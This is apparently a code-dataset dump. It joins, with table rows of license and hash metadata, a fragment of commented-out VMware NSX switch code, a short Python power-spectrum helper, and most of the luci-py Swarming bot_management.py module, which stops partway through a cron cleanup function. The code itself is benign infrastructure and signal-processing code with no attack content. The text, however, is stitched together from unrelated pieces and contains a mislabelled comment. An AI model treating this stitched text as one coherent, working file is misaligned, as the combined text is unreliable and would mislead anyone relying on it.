# move a VM to a logical switch
#vm_attach_body_dict = client_session.extract_resource_body_example('logicalSwitchVmAttach', 'read')
#client_session.view_body_dict(vm_attach_body_dict)
#vm_attach_body_dict['com.vmware.vshield.vsm.inventory.dto.VnicDto']['objectId'] = ''
#vm_attach_body_dict['com.vmware.vshield.vsm.inventory.dto.VnicDto']['portgroupId'] = new_ls['objectId']
#vm_attach_body_dict['com.vmware.vshield.vsm.inventory.dto.VnicDto']['vnicUuid'] = ''
| mit | 3,931,512,705,397,035,500 | 44.788235 | 115 | 0.753083 | false | 3.512635 | false | false | false |
ppuggioni/invivoinfer | invivoinfer/signalproc_functions.py | 1 | 1130 | from __future__ import division
import numpy as np
import scipy.signal as ssig
import math
import random
import matplotlib.pyplot as plt
import pdb
import nitime.algorithms as tsa
import nitime.utils as utils
# -------------------- Generate Inhomogeneous Poisson Process time events
def power_spectrum(trace,dt,windowl,overlap_perc=0.75,plot=0):
# using welch method
window_bin=nextpow2(windowl/dt)
overlap_bin=int(window_bin*overlap_perc)
f, Pxx_den = ssig.welch(trace,fs=1/dt,window='hanning',nperseg=window_bin,noverlap=overlap_bin, detrend='constant', scaling='density')
Pxx_den_std=Pxx_den*(window_bin/trace.size *11 / 9)**0.5
#pdb.set_trace()
if plot==1:
plt.semilogy(f, Pxx_den)
plt.semilogy(f,Pxx_den+Pxx_den_std,color='red')
plt.semilogy(f,Pxx_den-Pxx_den_std,color='red')
plt.ylim([0.5e-5, 1])
plt.xlim([0, 300])
plt.xlabel('frequency [Hz]')
plt.ylabel('PSD [V**2/Hz]')
plt.show()
return f,Pxx_den,Pxx_den_std
# ------------ USED HERE
def nextpow2(i):
n = 1
while n < i: n *= 2
return n
| apache-2.0 | 8,200,338,205,600,856,000 | 21.156863 | 138 | 0.630088 | false | 2.890026 | false | false | false |
luci/luci-py | appengine/swarming/server/bot_management.py | 2 | 34057 | # Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.
"""Swarming bot management, e.g. list of known bots and their state.
+-----------+
|BotRoot |
|id=<bot_id>|
+-----------+
|
+------+--------------+
| | |
| v v
| +-----------+ +-------+
| |BotSettings| |BotInfo|
| |id=settings| |id=info|
| +-----------+ +-------+
|
+------+-----------+----- ... ----+
| | | |
| v v v
| +--------+ +--------+ +--------+
| |BotEvent| |BotEvent| ... |BotEvent|
| |id=fffff| |if=ffffe| ... |id=00000|
| +--------+ +--------+ +--------+
|
+------+
| |
| v
| +-------------+
| |BotDimensions| task_queues.py
| |id=1 |
| +-------------+
|
+--------------- ... -----+
| |
v v
+-------------------+ +-------------------+
|BotTaskDimensions | ... |BotTaskDimensions | task_queues.py
|id=<dimension_hash>| ... |id=<dimension_hash>|
+-------------------+ +-------------------+
+--------Root---------+
|DimensionAggregation |
|id=<all or pool name>|
+---------------------+
- BotEvent is a monotonically inserted entity that is added for each event
happening for the bot.
- BotInfo is a 'dump-only' entity used for UI, it permits quickly show the
state of every bots in an single query. It is basically a cache of the last
BotEvent and additionally updated on poll. It doesn't need to be updated in a
transaction.
- BotSettings contains bot-specific settings. It must be updated in a
transaction and contains admin-provided settings, contrary to the other
entities which are generated from data provided by the bot itself.
"""
from collections import defaultdict
import datetime
import hashlib
import logging
from google.appengine import runtime
from google.appengine.api import datastore_errors
from google.appengine.api import memcache
from google.appengine.ext import ndb
from components import datastore_utils
from components import utils
from proto.api import swarming_pb2 # pylint: disable=no-name-in-module
from server import bq_state
from server import config
from server import task_pack
from server import task_queues
from server.constants import OR_DIM_SEP
# BotEvent entities are deleted when they are older than the cutoff.
_OLD_BOT_EVENTS_CUT_OFF = datetime.timedelta(days=4 * 7)
### Models.
# There is one BotRoot entity per bot id. Multiple bots could run on a single
# host, for example with multiple phones connected to a host. In this case, the
# id is specific to each device acting as a bot.
# BotRoot is the common ancestor of all per-bot entities (BotInfo, BotEvent,
# BotSettings), keeping each bot's data in a single entity group.
BotRoot = datastore_utils.get_versioned_root_model('BotRoot')
class _BotCommon(ndb.Model):
  """Common data between BotEvent and BotInfo.

  Parent is BotRoot.
  """
  # State is purely informative. It is completely free form.
  state = datastore_utils.DeterministicJsonProperty(json_type=dict)
  # IP address as seen by the HTTP handler.
  external_ip = ndb.StringProperty(indexed=False)
  # Bot identity as seen by the HTTP handler.
  authenticated_as = ndb.StringProperty(indexed=False)
  # Version of swarming_bot.zip the bot is currently running.
  version = ndb.StringProperty(default='', indexed=False)
  # Set when either:
  # - dimensions['quarantined'] or state['quarantined'] is set. This either
  #   happens via internal python error (e.g. an exception while generating
  #   dimensions) or via self-health check.
  # - dimensions['id'] is not exactly one item.
  # - invalid HTTP POST request keys.
  # - BotSettings.quarantined was set at that moment.
  # https://crbug.com/839415
  quarantined = ndb.BooleanProperty(default=False, indexed=False)
  # If set, the bot is rejecting tasks due to maintenance.
  maintenance_msg = ndb.StringProperty(indexed=False)
  # Affected by event_type == 'request_task', 'task_killed', 'task_completed',
  # 'task_error'.
  task_id = ndb.StringProperty(indexed=False)
  # Deprecated. TODO(crbug/897355): Remove.
  lease_id = ndb.StringProperty(indexed=False)
  lease_expiration_ts = ndb.DateTimeProperty(indexed=False)
  leased_indefinitely = ndb.BooleanProperty(indexed=False)
  machine_type = ndb.StringProperty(indexed=False)
  machine_lease = ndb.StringProperty(indexed=False)
  # Dimensions are used for task selection. They are encoded as a list of
  # key:value. Keep in mind that the same key can be used multiple times. The
  # list must be sorted. It is indexed to enable searching for bots.
  dimensions_flat = ndb.StringProperty(repeated=True)
  # Last time the bot pinged and this entity was updated
  last_seen_ts = ndb.DateTimeProperty()

  @property
  def dimensions(self):
    """Returns a dict representation of self.dimensions_flat."""
    # A key may appear several times in dimensions_flat, so each dict value is
    # a list of all values seen for that key.
    out = {}
    for i in self.dimensions_flat:
      k, v = i.split(':', 1)
      out.setdefault(k, []).append(v)
    return out

  @property
  def id(self):
    """Returns the bot id, i.e. the string id of the parent BotRoot key."""
    return self.key.parent().string_id()

  @property
  def task(self):
    """Returns the ndb.Key of the task run referenced by task_id, or None."""
    if not self.task_id:
      return None
    return task_pack.unpack_run_result_key(self.task_id)

  def to_dict(self, exclude=None):
    """Converts to a dict, replacing dimensions_flat with a dimensions dict."""
    exclude = ['dimensions_flat'] + (exclude or [])
    out = super(_BotCommon, self).to_dict(exclude=exclude)
    out['dimensions'] = self.dimensions
    return out

  def to_proto(self, out):
    """Converts self to a swarming_pb2.Bot."""
    # Used by BotEvent.to_proto() and BotInfo.to_proto().
    if self.key:
      out.bot_id = self.key.parent().string_id()
    #out.session_id = '' # https://crbug.com/786735
    for l in self.dimensions_flat:
      if l.startswith(u'pool:'):
        out.pools.append(l[len(u'pool:'):])
    # NOTE: is_dead is defined by the subclasses (BotInfo/BotEvent), not here.
    if self.is_dead:
      out.status = swarming_pb2.MISSING
      out.status_msg = ''
    # https://crbug.com/757931: QUARANTINED_BY_SERVER
    # https://crbug.com/870723: OVERHEAD_BOT_INTERNAL
    # https://crbug.com/870723: HOST_REBOOTING
    # https://crbug.com/913978: RESERVED
    # The chain below can overwrite the MISSING status set above: a
    # quarantined (or in-maintenance, or busy) bot reports that status even
    # when also considered dead.
    if self.quarantined:
      out.status = swarming_pb2.QUARANTINED_BY_BOT
      msg = (self.state or {}).get(u'quarantined')
      if msg:
        if not isinstance(msg, basestring):
          # Having {'quarantined': True} is valid for the state, convert this to
          # a string.
          msg = 'true'
        out.status_msg = msg
    elif self.maintenance_msg:
      out.status = swarming_pb2.OVERHEAD_MAINTENANCE_EXTERNAL
      out.status_msg = self.maintenance_msg
    elif self.task_id:
      out.status = swarming_pb2.BUSY
    if self.task_id:
      out.current_task_id = self.task_id
    for key, values in sorted(self.dimensions.items()):
      d = out.dimensions.add()
      d.key = key
      for value in values:
        d.values.append(value)

    # The BotInfo part.
    if self.state:
      out.info.supplemental.update(self.state)
    if self.version:
      out.info.version = self.version
    if self.authenticated_as:
      out.info.authenticated_as = self.authenticated_as
    if self.external_ip:
      out.info.external_ip = self.external_ip
    if self.is_dead and self.last_seen_ts:
      out.info.last_seen_ts.FromDatetime(self.last_seen_ts)
    # TODO(maruel): Populate bot.info.host and bot.info.devices.
    # https://crbug.com/916570

  def _pre_put_hook(self):
    """Keeps dimensions_flat sorted, as required for indexed bot searches."""
    super(_BotCommon, self)._pre_put_hook()
    self.dimensions_flat.sort()
class BotInfo(_BotCommon):
  """This entity declare the knowledge about a bot that successfully connected.

  Parent is BotRoot. Key id is 'info'.

  This entity is a cache of the last BotEvent and is additionally updated on
  poll, which does not create a BotEvent.
  """
  # Flag values stored in the `composite` list; one flag from each of the
  # following four groups is stored (see _calc_composite()).
  # One of:
  NOT_IN_MAINTENANCE = 1 << 9  # 512
  IN_MAINTENANCE = 1 << 8  # 256
  # One of:
  ALIVE = 1 << 7  # 128
  DEAD = 1 << 6  # 64
  # One of:
  HEALTHY = 1 << 3  # 8
  QUARANTINED = 1 << 2  # 4
  # One of:
  IDLE = 1<<1  # 2
  BUSY = 1<<0  # 1

  # First time this bot was seen.
  first_seen_ts = ndb.DateTimeProperty(auto_now_add=True, indexed=False)
  # Must only be set when self.task_id is set.
  task_name = ndb.StringProperty(indexed=False)
  # Avoid having huge amounts of indices to query by quarantined/idle.
  # Refreshed by _pre_put_hook() on every put.
  composite = ndb.IntegerProperty(repeated=True)

  def _calc_composite(self):
    """Returns the value for BotInfo.composite, which permits quick searches."""
    return [
        self.IN_MAINTENANCE
        if self.maintenance_msg else self.NOT_IN_MAINTENANCE,
        self.DEAD if self.should_be_dead else self.ALIVE,
        self.QUARANTINED if self.quarantined else self.HEALTHY,
        self.BUSY if self.task_id else self.IDLE
    ]

  @property
  def should_be_dead(self):
    """True if the bot has not been seen since the death deadline."""
    # check if the last seen is over deadline
    return self.last_seen_ts <= self._deadline()

  @property
  def is_dead(self):
    """True if the stored composite flags mark this bot as DEAD.

    Requires the entity to have been stored (composite is set in
    _pre_put_hook).
    """
    assert self.composite, 'Please store first'
    return self.DEAD in self.composite

  @property
  def is_alive(self):
    """True if the stored composite flags mark this bot as ALIVE."""
    assert self.composite, 'Please store first'
    return self.ALIVE in self.composite

  def to_dict(self, exclude=None):
    """Converts to a dict; adds the bot id and the is_dead flag."""
    out = super(BotInfo, self).to_dict(exclude=exclude)
    # Inject the bot id, since it's the entity key.
    out['id'] = self.id
    out['is_dead'] = self.is_dead
    return out

  def to_proto(self, out):
    """Converts self to a swarming_pb2.Bot."""
    # This populates most of the data.
    super(BotInfo, self).to_proto(out)
    # https://crbug.com/757931: QUARANTINED_BY_SERVER
    # https://crbug.com/870723: OVERHEAD_BOT_INTERNAL
    # https://crbug.com/870723: HOST_REBOOTING
    # https://crbug.com/913978: RESERVED
    # TODO(maruel): Populate bot.info.host and bot.info.devices.
    # https://crbug.com/916570

  def _pre_put_hook(self):
    """Clears stale task_name and recomputes composite before each put."""
    super(BotInfo, self)._pre_put_hook()
    if not self.task_id:
      self.task_name = None
    self.composite = self._calc_composite()

  @classmethod
  def yield_alive_bots(cls):
    """Yields alive bots."""
    return cls.query(cls.composite == cls.ALIVE)

  @classmethod
  def yield_bots_should_be_dead(cls):
    """Yields bots who should be dead."""
    # Pages through ALIVE bots and filters in-process on should_be_dead, since
    # the death deadline is computed at read time and cannot be queried.
    q = cls.yield_alive_bots()
    cursor = None
    more = True
    while more:
      bots, cursor, more = q.fetch_page(1000, start_cursor=cursor)
      for b in bots:
        if not b.should_be_dead:
          continue
        yield b

  @staticmethod
  def _deadline():
    """Returns the datetime before which an unseen bot is considered dead."""
    dt = datetime.timedelta(seconds=config.settings().bot_death_timeout_secs)
    return utils.utcnow() - dt
class BotEvent(_BotCommon):
  """This entity is immutable.

  Parent is BotRoot. Key id is monotonically decreasing with
  datastore_utils.store_new_version().

  This entity is created on each bot state transition.
  """
  # Maps event_type strings to swarming_pb2 BotEvent enum values. A None value
  # means the event has no proto equivalent and is left unset by to_proto().
  _MAPPING = {
      'bot_connected': swarming_pb2.BOT_NEW_SESSION,
      'bot_internal_failure': swarming_pb2.BOT_INTERNAL_FAILURE,
      'bot_hook_error': swarming_pb2.BOT_HOOK_ERROR,
      'bot_hook_log': swarming_pb2.BOT_HOOK_LOG,
      # Historically ambiguous. It used to be both bot_internal_failure and
      # bot_hook_error.
      'bot_error': swarming_pb2.BOT_HOOK_ERROR,
      # Historical misnaming. This is equivalent to bot_hook_log.
      'bot_log': swarming_pb2.BOT_HOOK_LOG,
      # TODO(maruel): Add definition if desired.
      'bot_leased': None,
      # Historical misnaming.
      'bot_rebooting': swarming_pb2.BOT_REBOOTING_HOST,
      'bot_shutdown': swarming_pb2.BOT_SHUTDOWN,
      # Historical misnaming.
      'bot_terminate': swarming_pb2.INSTRUCT_TERMINATE_BOT,
      'bot_missing': swarming_pb2.BOT_MISSING,
      'request_restart': swarming_pb2.INSTRUCT_RESTART_BOT,
      # Shall only be sorted when there is a significant difference in the bot
      # state versus the previous event.
      'request_sleep': swarming_pb2.INSTRUCT_IDLE,
      'request_task': swarming_pb2.INSTRUCT_START_TASK,
      'request_update': swarming_pb2.INSTRUCT_UPDATE_BOT_CODE,
      'task_completed': swarming_pb2.TASK_COMPLETED,
      'task_error': swarming_pb2.TASK_INTERNAL_FAILURE,
      'task_killed': swarming_pb2.TASK_KILLED,
      # This value is not registered in the API.
      'task_update': None
  }
  # The set of valid event_type values; enforced via the ndb choices=.
  ALLOWED_EVENTS = {
      # Bot specific events that are outside the scope of a task:
      'bot_connected',
      # Deprecated. Use bot_hook_error or bot_internal_failure.
      # TODO(maruel): Remove 2020-01-01.
      'bot_error',
      'bot_internal_failure',
      'bot_hook_error',
      'bot_hook_log',
      'bot_leased',
      # Deprecated. Use bot_hook_log.
      # TODO(maruel): Remove 2020-01-01.
      'bot_log',
      'bot_missing',
      'bot_rebooting',
      'bot_shutdown',
      'bot_terminate',

      # Bot polling result:
      'request_restart',
      'request_sleep',
      'request_task',
      'request_update',

      # Task lifetime as processed by the bot:
      'task_completed',
      'task_error',
      'task_killed',
      'task_update',
  }
  # Common properties for all events (which includes everything in _BotCommon).
  ts = ndb.DateTimeProperty(auto_now_add=True)
  event_type = ndb.StringProperty(choices=ALLOWED_EVENTS)
  # event_type == 'bot_error', 'request_restart', 'bot_rebooting', etc.
  message = ndb.TextProperty()

  @property
  def is_dead(self):
    """True for the server-generated 'bot_missing' event."""
    return self.event_type == 'bot_missing'

  @property
  def previous_key(self):
    """Returns the ndb.Key to the previous event."""
    # Event ids are monotonically decreasing, so the previous event has id+1.
    return ndb.Key(
        self.__class__, self.key.integer_id()+1, parent=self.key.parent())

  def to_proto(self, out):
    """Converts self to a swarming_pb2.BotEvent."""
    if self.ts:
      out.event_time.FromDatetime(self.ts)
    # Populates out.bot with _BotCommon.
    _BotCommon.to_proto(self, out.bot)
    # https://crbug.com/905087: BOT_DELETED
    e = self._MAPPING.get(self.event_type)
    if e:
      out.event = e
    if self.message:
      out.event_msg = self.message
class BotSettings(ndb.Model):
  """Contains all settings that are set by the administrator on the server.

  Parent is BotRoot. Key id is 'settings'.

  This entity must always be updated in a transaction.
  """
  # If set to True, no task is handed out to this bot due to the bot being in a
  # broken situation.
  # Admin-provided, contrary to the bot-reported quarantined flag on
  # _BotCommon.
  quarantined = ndb.BooleanProperty()
class DimensionValues(ndb.Model):
  """Inlined into DimensionAggregation, never stored standalone."""
  # Dimension key, e.g. 'pool'.
  dimension = ndb.StringProperty()
  # Values observed for this dimension key across the aggregated bots.
  values = ndb.StringProperty(repeated=True)
class DimensionAggregation(ndb.Model):
  """Has all dimensions that are currently exposed by the bots.

  There's a single root entity stored with id 'current', see KEY below.

  This entity is updated via cron job /internal/cron/aggregate_bots_dimensions
  updated every hour.
  """
  # One DimensionValues entry per dimension key; compressed since this list
  # can be large.
  dimensions = ndb.LocalStructuredProperty(
      DimensionValues, repeated=True, compressed=True)
  # When the aggregation was last computed.
  ts = ndb.DateTimeProperty()

  # Key for all dimensions. the legacy key 'current' will be removed.
  KEY = ndb.Key('DimensionAggregation', 'current')
### Public APIs.
def get_root_key(bot_id):
  """Returns the top-level BotRoot ndb.Key for the given bot id.

  Raises:
    ValueError: if bot_id is empty or None.
  """
  if bot_id:
    return ndb.Key(BotRoot, bot_id)
  raise ValueError('Bad id')
def get_info_key(bot_id):
  """Returns the singleton BotInfo ndb.Key ('info') under the bot's root."""
  root = get_root_key(bot_id)
  return ndb.Key(BotInfo, 'info', parent=root)
def get_events_query(bot_id, order):
  """Returns an ndb.Query for most recent events in reverse chronological order.

  BotEvent ids decrease monotonically, so ordering by key yields the newest
  events first.
  """
  # The in-process local cache is disabled on purpose: up to a thousand
  # entities can be loaded by this query and there's no chance this instance
  # will need them again, so caching them is a pure memory leak that leads to
  # 'Exceeded soft memory limit' AppEngine errors.
  options = ndb.QueryOptions(use_cache=False)
  query = BotEvent.query(
      default_options=options, ancestor=get_root_key(bot_id))
  return query.order(BotEvent.key) if order else query
def get_settings_key(bot_id):
  """Returns the singleton BotSettings ndb.Key ('settings') for the bot."""
  root = get_root_key(bot_id)
  return ndb.Key(BotSettings, 'settings', parent=root)
def get_aggregation_key(group):
  """Returns the DimensionAggregation ndb.Key for the given group name."""
  return ndb.Key(DimensionAggregation, group)
def filter_dimensions(q, dimensions):
  """Narrows a BotInfo ndb.Query with 'key:value' dimension filters.

  Each entry must be of the form 'key:value'. The value part may contain the
  OR separator to match any of several values, e.g. 'foo:A|B' matches bots
  exposing either 'foo:A' or 'foo:B'.

  Raises:
    ValueError: if an entry is malformed (missing ':', or an empty or
        unstripped key/value).
  """
  for entry in dimensions:
    key, sep, value = entry.partition(':')
    if not sep or any(not p or p.strip() != p for p in (key, value)):
      raise ValueError('Invalid dimensions')
    # Expand the OR operator into one flat dimension string per alternative.
    alternatives = ['%s:%s' % (key, v) for v in value.split(OR_DIM_SEP)]
    q = q.filter(BotInfo.dimensions_flat.IN(alternatives))
  return q
def filter_availability(q, quarantined, in_maintenance, is_dead, is_busy):
  """Filters a BotInfo ndb.Query on the composite availability flags.

  Each argument is tri-state: None means "don't filter on this axis", truthy
  selects the first flag of the pair, falsy selects the second.
  """
  def composite_for(flag, when_true, when_false):
    # Maps a tri-state flag to the composite value to filter on (or None).
    if flag is None:
      return None
    return when_true if flag else when_false

  choices = (
      composite_for(quarantined, BotInfo.QUARANTINED, BotInfo.HEALTHY),
      composite_for(
          in_maintenance, BotInfo.IN_MAINTENANCE, BotInfo.NOT_IN_MAINTENANCE),
      composite_for(is_busy, BotInfo.BUSY, BotInfo.IDLE),
      composite_for(is_dead, BotInfo.DEAD, BotInfo.ALIVE),
  )
  for composite in choices:
    if composite is not None:
      q = q.filter(BotInfo.composite == composite)

  # TODO(charliea): Add filtering based on the 'maintenance' field.
  return q
def bot_event(
    event_type, bot_id, external_ip, authenticated_as, dimensions, state,
    version, quarantined, maintenance_msg, task_id, task_name,
    register_dimensions, **kwargs):
  """Records when a bot has queried for work.

  This event happening usually means the bot is alive (not dead), except for
  'bot_missing' event which is created by server. It may be quarantined, and
  in this case, it will be evicted from the task queues.

  If it's declaring maintenance, it will not be evicted from the task queues, as
  maintenance is supposed to be temporary and expected to complete within a
  reasonable time frame.

  Arguments:
  - event_type: event type, one of BotEvent.ALLOWED_EVENTS.
  - bot_id: bot id.
  - external_ip: IP address as seen by the HTTP handler.
  - authenticated_as: bot identity as seen by the HTTP handler.
  - dimensions: Bot's dimensions as self-reported. If not provided, keep
    previous value.
  - state: ephemeral state of the bot. It is expected to change constantly. If
    not provided, keep previous value.
  - version: swarming_bot.zip version as self-reported. Used to spot if a bot
    failed to update promptly. If not provided, keep previous value.
  - quarantined: bool to determine if the bot was declared quarantined.
  - maintenance_msg: string describing why the bot is in maintenance.
  - task_id: packed task id if relevant. Set to '' to zap the stored value.
  - task_name: task name if relevant. Zapped when task_id is zapped.
  - register_dimensions: bool to specify whether to register dimensions to
    BotInfo.
  - kwargs: optional values to add to BotEvent relevant to event_type.

  Returns:
    ndb.Key to BotEvent entity if one was added, None otherwise.
  """
  if not bot_id:
    return

  # Retrieve the previous BotInfo and update it.
  info_key = get_info_key(bot_id)
  bot_info = info_key.get()
  if not bot_info:
    bot_info = BotInfo(key=info_key)
    if dimensions:
      dimensions_flat = task_queues.bot_dimensions_to_flat(dimensions)
      # Register only id and pool dimensions at the first handshake.
      bot_info.dimensions_flat = [
          d for d in dimensions_flat
          if d.startswith('id:') or d.startswith('pool:')
      ]

  now = utils.utcnow()
  # bot_missing event is created by a server, not a bot.
  # So it shouldn't update last_seen_ts, external_ip, authenticated_as,
  # maintenance_msg.
  # If the last_seen_ts gets updated, it would change the bot composite
  # to alive. And if it clears maintenance_msg, it would change the composite
  # to NOT_IN_MAINTENANCE and lose the message.
  if event_type != 'bot_missing':
    bot_info.last_seen_ts = now
    bot_info.external_ip = external_ip
    bot_info.authenticated_as = authenticated_as
    bot_info.maintenance_msg = maintenance_msg
  dimensions_updated = False
  dimensions_flat = []
  if dimensions:
    dimensions_flat = task_queues.bot_dimensions_to_flat(dimensions)
    # Only record full dimensions when the caller asked for it; otherwise the
    # previous stored value is kept.
    if register_dimensions and bot_info.dimensions_flat != dimensions_flat:
      logging.debug('bot_event: Updating dimensions. from: %s, to: %s',
                    bot_info.dimensions_flat, dimensions_flat)
      bot_info.dimensions_flat = dimensions_flat
      dimensions_updated = True
  if state:
    bot_info.state = state
  if quarantined is not None:
    bot_info.quarantined = quarantined
  if task_id is not None:
    bot_info.task_id = task_id
  # Remove the task from the BotInfo summary in the following cases
  # 1) When the task finishes (event_type=task_XXX)
  #    In these cases, the BotEvent shall have the task
  #    since the event still refers to it
  # 2) When the bot is pooling (event_type=request_sleep)
  #    The bot has already finished the previous task.
  #    But it could have forgotten to remove the task from the BotInfo.
  #    So ensure the task is removed.
  # 3) When the bot is missing
  #    We assume it can't process assigned task anymore.
  if event_type in ('task_completed', 'task_error', 'task_killed',
                    'request_sleep', 'bot_missing'):
    bot_info.task_id = None
    bot_info.task_name = None
  if task_name:
    bot_info.task_name = task_name
  if version is not None:
    bot_info.version = version

  if quarantined:
    # Make sure it is not in the queue since it can't reap anything.
    task_queues.cleanup_after_bot(info_key.parent())

  # Decide whether saving the event.
  # It's not much of an even worth saving a BotEvent for but it's worth
  # updating BotInfo. The only reason BotInfo is GET is to keep first_seen_ts.
  # It's not necessary to use a transaction here since no BotEvent is being
  # added, only last_seen_ts is really updated.
  # crbug.com/1015365: It's useful saving BotEvent when dimensions updates.
  # crbug.com/952984: It needs to save BotEvent when quarantined.
  skip_save_event = (not dimensions_updated and not quarantined and
                     event_type in ('request_sleep', 'task_update'))
  if skip_save_event:
    bot_info.put()
    return

  # When it's a 'bot_*' or 'request_*' event, use the dimensions provided
  # by the bot.
  # When it's a 'task_*' event, use BotInfo.dimensios_flat since dimensions
  # aren't provided by the bot.
  event_dimensions_flat = dimensions_flat or bot_info.dimensions_flat

  event = BotEvent(
      parent=get_root_key(bot_id),
      event_type=event_type,
      external_ip=external_ip,
      authenticated_as=authenticated_as,
      dimensions_flat=event_dimensions_flat,
      quarantined=bot_info.quarantined,
      maintenance_msg=bot_info.maintenance_msg,
      state=bot_info.state,
      task_id=task_id or bot_info.task_id,
      version=bot_info.version,
      **kwargs)
  # Stores the event and the updated BotInfo in the same transaction.
  datastore_utils.store_new_version(event, BotRoot, [bot_info])
  return event.key
def has_capacity(dimensions):
  """Returns True if there's a reasonable chance for this task request
  dimensions set to be serviced by a bot alive.

  First look at the task queues, then look into the datastore to figure this
  out.
  """
  assert not ndb.in_transaction()
  # Look at the fast path.
  cap = task_queues.probably_has_capacity(dimensions)
  if cap is not None:
    return cap

  # Add it to the 'quick cache' to improve performance. This cache is kept for
  # the same duration as how long bots are considered still alive without a
  # ping. Useful if there's a single bot in the fleet for these dimensions and
  # it takes a long time to reboot. This is the case with Android with slow
  # initialization and some baremetal bots (thanks SCSI firmware!).
  seconds = config.settings().bot_death_timeout_secs

  @ndb.tasklet
  def run_query(flat):
    # Do a query. That's slower and it's eventually consistent.
    # `flat` is one fully expanded list of 'key:value' dimension strings.
    q = BotInfo.query()
    for f in flat:
      q = q.filter(BotInfo.dimensions_flat == f)
    num = yield q.count_async(limit=1)
    if num:
      logging.info('Found capacity via BotInfo: %s', flat)
      raise ndb.Return(True)

    # Search a bit harder. In this case, we're looking for BotEvent which would
    # be a bot that used to exist recently.
    cutoff = utils.utcnow() - datetime.timedelta(seconds=seconds)
    q = BotEvent.query(BotEvent.ts > cutoff)
    for f in flat:
      q = q.filter(BotEvent.dimensions_flat == f)
    num = yield q.count_async(limit=1)
    if num:
      logging.info('Found capacity via BotEvent: %s', flat)
      raise ndb.Return(True)
    raise ndb.Return(False)

  # Run one query per OR-expanded dimension combination, in parallel.
  futures = [
      run_query(f) for f in task_queues.expand_dimensions_to_flats(dimensions)
  ]

  ndb.tasklets.Future.wait_all(futures)
  # A single matching combination is enough to declare capacity.
  if any(f.get_result() for f in futures):
    task_queues.set_has_capacity(dimensions, seconds)
    return True

  logging.warning('HAS NO CAPACITY: %s', dimensions)
  return False
def get_pools_from_dimensions_flat(dimensions_flat):
"""Gets pools from dimensions_flat."""
return [
d.replace('pool:', '') for d in dimensions_flat if d.startswith('pool:')
]
def cron_update_bot_info():
"""Refreshes BotInfo.composite for dead bots."""
@ndb.tasklet
def run(bot):
if bot and bot.should_be_dead and (bot.is_alive or not bot.is_dead):
# bot composite get updated in _pre_put_hook
yield bot.put_async()
logging.info('Changing Bot status to DEAD: %s', bot.id)
raise ndb.Return(bot.key)
raise ndb.Return(None)
def tx_result(future, stats):
bot_key = future.get_result()
if not bot_key:
# Do nothing.
return
try:
# Unregister the bot from task queues since it can't reap anything.
task_queues.cleanup_after_bot(bot_key.parent())
stats['dead'] += 1
bot = bot_key.get()
if not bot:
logging.warning('BotInfo does not exist. key: %s', bot_key)
stats['failed'] += 1
return
logging.info('Sending bot_missing event: %s', bot.id)
bot_event(
event_type='bot_missing',
bot_id=bot.id,
message=None,
external_ip=None,
authenticated_as=None,
dimensions=None,
state=None,
version=None,
quarantined=None,
maintenance_msg=None,
task_id=None,
task_name=None,
register_dimensions=False,
last_seen_ts=bot.last_seen_ts)
except datastore_utils.CommitError:
logging.warning('Failed to commit a Tx')
stats['failed'] += 1
# The assumption here is that a cron job can churn through all the entities
# fast enough. The number of dead bot is expected to be <10k. In practice the
# average runtime is around 8 seconds.
cron_stats = {
'dead': 0,
'seen': 0,
'failed': 0,
}
futures = []
logging.debug('Updating dead bots...')
try:
for b in BotInfo.yield_bots_should_be_dead():
cron_stats['seen'] += 1
# Retry more often than the default 1. We do not want to throw too much
# in the logs and there should be plenty of time to do the retries.
f = datastore_utils.transaction_async(lambda: run(b), retries=5)
futures.append(f)
if len(futures) < 5:
continue
ndb.Future.wait_any(futures)
for i in range(len(futures) - 1, -1, -1):
if futures[i].done():
f = futures.pop(i)
tx_result(f, cron_stats)
if cron_stats['seen'] % 50 == 0:
logging.debug('Fetched %d bot keys', cron_stats['seen'])
for f in futures:
tx_result(f, cron_stats)
finally:
logging.debug('Seen %d bots, updated %d dead bots, failed %d tx',
cron_stats['seen'], cron_stats['dead'], cron_stats['failed'])
return cron_stats['dead']
def cron_delete_old_bot_events():
"""Deletes very old BotEvent entities."""
start = utils.utcnow()
# Run for 4.5 minutes and schedule the cron job every 5 minutes. Running for
# 9.5 minutes (out of 10 allowed for a cron job) results in 'Exceeded soft
# private memory limit of 512 MB with 512 MB' even if this loop should be
# fairly light on memory usage.
time_to_stop = start + datetime.timedelta(seconds=int(4.5*60))
end_ts = start - _OLD_BOT_EVENTS_CUT_OFF
more = True
cursor = None
count = 0
first_ts = None
try:
# Order is by key, so it is naturally ordered by bot, which means the
# operations will mainly operate on one root entity at a time.
q = BotEvent.query(default_options=ndb.QueryOptions(keys_only=True)).filter(
BotEvent.ts <= end_ts)
while more:
keys, cursor, more = q.fetch_page(10, start_cursor=cursor)
if not keys:
break
if not first_ts:
# Fetch the very first entity to get an idea of the range being
# processed.
while keys:
# It's possible that the query returns ndb.Key for entities that do
# not exist anymore due to an inconsistent index. Handle this
# explicitly.
e = keys[0].get()
if not e:
keys = keys[1:]
continue
first_ts = e.ts
break
ndb.delete_multi(keys)
count += len(keys)
if utils.utcnow() >= time_to_stop:
break
return count
except runtime.DeadlineExceededError:
pass
finally:
def _format_ts(t):
# datetime.datetime
return t.strftime(u'%Y-%m-%d %H:%M') if t else 'N/A'
def _format_delta(e, s):
# datetime.timedelta
return str(e-s).rsplit('.', 1)[0] if e and s else 'N/A'
logging.info(
'Deleted %d BotEvent entities; from %s\n'
'Cut off was %s; trailing by %s', count, _format_ts(first_ts),
_format_ts(end_ts), _format_delta(end_ts, first_ts))
def cron_delete_old_bot():
"""Deletes stale BotRoot entity groups."""
start = utils.utcnow()
# Run for 4.5 minutes and schedule the cron job every 5 minutes. Running for
# 9.5 minutes (out of 10 allowed for a cron job) results in 'Exceeded soft
# private memory limit of 512 MB with 512 MB' even if this loop should be
# fairly light on memory usage.
time_to_stop = start + datetime.timedelta(seconds=int(4.5*60))
total = 0
skipped = 0
deleted = []
try:
q = BotRoot.query(default_options=ndb.QueryOptions(keys_only=True))
cursor = None
more = True
while more:
bot_root_keys, cursor, more = q.fetch_page(1000, start_cursor=cursor)
for bot_root_key in bot_root_keys:
# Check if it has any BotEvent left. If not, it means that the entity is
# older than _OLD_BOT_EVENTS_CUF_OFF, so the whole thing can be deleted
# now.
# In particular, ignore the fact that BotInfo may still exist, since if
# there's no BotEvent left, it's probably a broken entity or a forgotten
# dead bot.
if BotEvent.query(ancestor=bot_root_key).count(limit=1):
skipped += 1
continue
deleted.append(bot_root_key.string_id())
